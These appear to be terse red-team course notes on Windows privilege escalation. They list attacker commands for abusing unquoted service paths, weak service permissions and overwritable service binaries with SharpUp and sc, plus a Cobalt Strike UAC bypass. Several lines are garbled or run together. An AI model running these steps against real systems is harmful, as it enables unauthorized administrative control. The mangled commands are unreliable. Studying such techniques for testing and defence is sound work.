In keeping with the mantra of “principle of least privilege” - privilege escalation should only be sought after if it provides a means of reaching your goal, not something you do “just because”. Exploiting a privilege escalation vulnerability provides defenders with additional data points to detect your presence. It’s a risk vs reward calculation that you must make.
- tooling:
SharpUp
potential vectors
services
services.mscodersc queryGet-Service | fl- Properties
- Binary Path
- Startup Type, preferably automatic
- Service Status
- Log On As (can be domain or local account)
unquoted service paths
-
run wmic service get name, pathname -
powershell Get-Acl -Path "C:\Program Files\Vulnerable Services" | fl -
execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit UnquotedServicePath -
beacons to use: service binaries, -svc in the payload filename
-
upload
-
rename to path part
-
sc stop service -
sc start service -
connect to beacon
weak service permisssions
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit ModifiableServices
PS> import c:\\tools\\Get-ServiceAcl.ps1
PS> Get-ServiceAcl -Name VulnService | select -expand Access- ChangeConfig, Stop, Start would be great
> run sc config VulnService2 binPath= c:\badfile
> run sc qc VulnService2
> run sc stop VulnService2
> run sc start VulnService2weak service binary permissions
binary itself can be overwritten
beacon> powershell Get-Acl -Path "C:\Program Files\Vulnerable Services\Service 3.exe" | fl
sc stop servicecopy binary over rthe servciesc start service
UAC bypass
whoami /groups→ medium mandatory level → UAC problem- Elevate Kit (this is preloaded into cobalt strike and can be called through
elevate)
> elevate uac-schtask tcp-local